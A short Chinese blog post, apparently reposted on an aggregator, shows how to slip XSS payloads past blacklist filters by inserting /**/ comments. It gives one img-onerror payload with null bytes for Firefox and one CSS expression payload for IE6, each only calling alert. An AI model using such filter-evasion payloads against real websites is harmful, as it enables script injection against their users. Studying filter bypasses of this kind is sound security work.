火狐下:
<img/srC="x"/*%00*/oneRror=/**/alert(1)/*%00*/>
IE6下:
样式表中的/**/会被浏览器忽略,因此可以运用/**/来注释字符,通过插入/**/来绕过过滤如下:
<img src="1" style="width: exp/**/re/**/ss/**/ion(alert(‘xss‘));">
Posted xxrens
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了利用/**/来绕过黑名单相关的知识,希望对你有一定的参考价值。
以上是关于利用/**/来绕过黑名单的主要内容,如果未能解决你的问题,请参考以下文章
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
oracle 7月份更新 CVE-2020-14625 复现&利用